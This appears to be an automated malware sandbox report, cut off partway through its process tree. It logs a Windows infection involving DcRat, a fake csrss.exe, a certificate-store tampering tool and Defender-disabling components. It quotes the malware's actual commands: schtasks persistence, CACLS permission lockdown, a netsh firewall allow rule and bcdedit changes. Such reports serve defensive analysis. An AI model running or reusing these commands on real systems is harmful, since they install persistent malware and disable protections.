030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 csrss.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 patch.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2376 AppLaunch.exe 2376 AppLaunch.exe 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1204 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 464 Process not Found -
Suspicious behavior: MapViewOfSection 2 IoCs
pid Process 2376 AppLaunch.exe 1004 toolspub2.exe -
Suspicious use of AdjustPrivilegeToken 59 IoCs
description pid Process Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 2060 E9B7.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 1460 K.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 964 Process not Found Token: SeImpersonatePrivilege 964 Process not Found Token: SeDebugPrivilege 1680 powershell.EXE Token: SeDebugPrivilege 2836 powershell.exe Token: SeShutdownPrivilege 1752 powercfg.exe Token: SeDebugPrivilege 2936 powershell.exe Token: SeShutdownPrivilege 1832 powercfg.exe Token: SeShutdownPrivilege 2140 powercfg.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1604 powercfg.exe Token: SeSystemEnvironmentPrivilege 2300 csrss.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 2544 powershell.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeDebugPrivilege 2044 jsc.exe Token: SeDebugPrivilege 3044 powershell.exe Token: SeShutdownPrivilege 2744 powercfg.exe Token: SeDebugPrivilege 2016 powershell.exe Token: SeShutdownPrivilege 2472 powercfg.exe Token: SeShutdownPrivilege 1880 powercfg.exe Token: SeShutdownPrivilege 1740 powercfg.exe Token: SeDebugPrivilege 1556 updater.exe Token: SeLockMemoryPrivilege 1940 explorer.exe Token: SeSecurityPrivilege 1112 sc.exe Token: SeSecurityPrivilege 1112 sc.exe Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE Token: SeShutdownPrivilege 1204 Explorer.EXE -
Suspicious use of FindShellTrayWindow 20 IoCs
pid Process 1204 Explorer.EXE 1204 Explorer.EXE 2912 iexplore.exe 1816 iexplore.exe 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE -
Suspicious use of SendNotifyMessage 6 IoCs
pid Process 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE 1204 Explorer.EXE -
Suspicious use of SetWindowsHookEx 10 IoCs
pid Process 2912 iexplore.exe 2912 iexplore.exe 2076 IEXPLORE.EXE 2076 IEXPLORE.EXE 1816 iexplore.exe 1816 iexplore.exe 1972 IEXPLORE.EXE 1972 IEXPLORE.EXE 1972 IEXPLORE.EXE 1972 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1028 wrote to memory of 2376 1028 3GW56sB.exe 27 PID 1028 wrote to memory of 2376 1028 3GW56sB.exe 27 PID 1028 wrote to memory of 2376 1028 3GW56sB.exe 27 PID 1028 wrote to memory of 2376 1028 3GW56sB.exe 27 PID 1028 wrote to memory of 2376 1028 3GW56sB.exe 27 PID 1028 wrote to memory of 2376 1028 3GW56sB.exe 27 PID 1028 wrote to memory of 2376 1028 3GW56sB.exe 27 PID 1028 wrote to memory of 2376 1028 3GW56sB.exe 27 PID 1028 wrote to memory of 2376 1028 3GW56sB.exe 27 PID 1028 wrote to memory of 2376 1028 3GW56sB.exe 27 PID 1204 wrote to memory of 2756 1204 Explorer.EXE 30 PID 1204 wrote to memory of 2756 1204 Explorer.EXE 30 PID 1204 wrote to memory of 2756 1204 Explorer.EXE 30 PID 1204 wrote to memory of 2756 1204 Explorer.EXE 30 PID 1204 wrote to memory of 2756 1204 Explorer.EXE 30 PID 1204 wrote to memory of 2756 1204 Explorer.EXE 30 PID 1204 wrote to memory of 2756 1204 Explorer.EXE 30 PID 2756 wrote to memory of 2604 2756 DE1F.exe 31 PID 2756 wrote to memory of 2604 2756 DE1F.exe 31 PID 2756 wrote to memory of 2604 2756 DE1F.exe 31 PID 2756 wrote to memory of 2604 2756 DE1F.exe 31 PID 2756 wrote to memory of 2604 2756 DE1F.exe 31 PID 2756 wrote to memory of 2604 2756 DE1F.exe 31 PID 2756 wrote to memory of 2604 2756 DE1F.exe 31 PID 1204 wrote to memory of 1492 1204 Explorer.EXE 32 PID 1204 wrote to memory of 1492 1204 Explorer.EXE 32 PID 1204 wrote to memory of 1492 1204 Explorer.EXE 32 PID 1204 wrote to memory of 1492 1204 Explorer.EXE 32 PID 2604 wrote to memory of 2620 2604 Rl0Uz9HJ.exe 33 PID 2604 wrote to memory of 2620 2604 Rl0Uz9HJ.exe 33 PID 2604 wrote to memory of 2620 2604 Rl0Uz9HJ.exe 33 PID 2604 wrote to memory of 2620 2604 Rl0Uz9HJ.exe 33 PID 2604 wrote to memory of 2620 2604 Rl0Uz9HJ.exe 33 PID 2604 wrote to memory of 2620 2604 Rl0Uz9HJ.exe 33 PID 2604 wrote to memory of 2620 2604 Rl0Uz9HJ.exe 33 PID 2620 wrote to memory of 1824 2620 vk8qw0bZ.exe 34 PID 2620 wrote to memory of 1824 2620 vk8qw0bZ.exe 34 PID 2620 wrote to memory of 1824 2620 vk8qw0bZ.exe 34 PID 2620 wrote to memory of 1824 2620 vk8qw0bZ.exe 34 PID 2620 wrote to memory of 1824 2620 vk8qw0bZ.exe 34 PID 2620 wrote to memory of 1824 2620 vk8qw0bZ.exe 34 PID 2620 wrote to memory of 1824 2620 vk8qw0bZ.exe 34 PID 1824 wrote to memory of 784 1824 TM0pC3TM.exe 35 PID 1824 wrote to memory of 784 1824 TM0pC3TM.exe 35 PID 1824 wrote to memory of 784 1824 TM0pC3TM.exe 35 PID 1824 wrote to memory of 784 1824 TM0pC3TM.exe 35 PID 1824 wrote to memory of 784 1824 TM0pC3TM.exe 35 PID 1824 wrote to memory of 784 1824 TM0pC3TM.exe 35 PID 1824 wrote to memory of 784 1824 TM0pC3TM.exe 35 PID 1204 wrote to memory of 1300 1204 Explorer.EXE 38 PID 1204 wrote to memory of 1300 1204 Explorer.EXE 38 PID 1204 wrote to memory of 1300 1204 Explorer.EXE 38 PID 784 wrote to memory of 1344 784 YD6bx5XP.exe 36 PID 784 wrote to memory of 1344 784 YD6bx5XP.exe 36 PID 784 wrote to memory of 1344 784 YD6bx5XP.exe 36 PID 784 wrote to memory of 1344 784 YD6bx5XP.exe 36 PID 784 wrote to memory of 1344 784 YD6bx5XP.exe 36 PID 784 wrote to memory of 1344 784 YD6bx5XP.exe 36 PID 784 wrote to memory of 1344 784 YD6bx5XP.exe 36 PID 784 wrote to memory of 2516 784 YD6bx5XP.exe 40 PID 784 wrote to memory of 2516 784 YD6bx5XP.exe 40 PID 784 wrote to memory of 2516 784 YD6bx5XP.exe 40 PID 784 wrote to memory of 2516 784 YD6bx5XP.exe 40 PID 784 wrote to memory of 2516 784 YD6bx5XP.exe 40 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Users\Admin\AppData\Local\Temp\3GW56sB.exe"C:\Users\Admin\AppData\Local\Temp\3GW56sB.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1028 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"3⤵
- DcRat
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:2376
-
-
-
C:\Users\Admin\AppData\Local\Temp\DE1F.exeC:\Users\Admin\AppData\Local\Temp\DE1F.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2756 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Rl0Uz9HJ.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\vk8qw0bZ.exe4⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\TM0pC3TM.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1824 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YD6bx5XP.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1Dk37rF7.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1344
-
-
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exeC:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Jf821dM.exe7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2516
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\E042.exeC:\Users\Admin\AppData\Local\Temp\E042.exe2⤵
- Executes dropped EXE
PID:1492
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\E208.bat" "2⤵PID:1300
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://www.facebook.com/login3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:2912 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2912 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2076
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://accounts.google.com/3⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:1816 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1816 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1972
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\E86F.exeC:\Users\Admin\AppData\Local\Temp\E86F.exe2⤵
- Executes dropped EXE
PID:1480
-
-
C:\Users\Admin\AppData\Local\Temp\E9B7.exeC:\Users\Admin\AppData\Local\Temp\E9B7.exe2⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:2060
-
-
C:\Users\Admin\AppData\Local\Temp\EB6D.exeC:\Users\Admin\AppData\Local\Temp\EB6D.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1648 -
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"3⤵
- Executes dropped EXE
PID:1224 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F4⤵
- DcRat
- Creates scheduled task(s)
PID:1988
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit4⤵PID:2328
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:1936
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:N"5⤵PID:2232
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "explothe.exe" /P "Admin:R" /E5⤵PID:2660
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:2656
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:N"5⤵PID:2404
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\fefffe8cea" /P "Admin:R" /E5⤵PID:2928
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main4⤵
- Loads dropped DLL
PID:1552
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\80CA.exeC:\Users\Admin\AppData\Local\Temp\80CA.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3032 -
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:2108 -
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"4⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1004
-
-
-
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"3⤵
- Executes dropped EXE
PID:964 -
C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"4⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2352 -
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:2532
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:568
-
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:2300 -
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:2784
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:2576
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵
- Executes dropped EXE
PID:1624
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"6⤵
- Executes dropped EXE
- Modifies system certificate store
PID:276
-
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v6⤵
- Modifies boot configuration data using bcdedit
PID:2692
-
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- DcRat
- Creates scheduled task(s)
PID:2792
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:2544 -
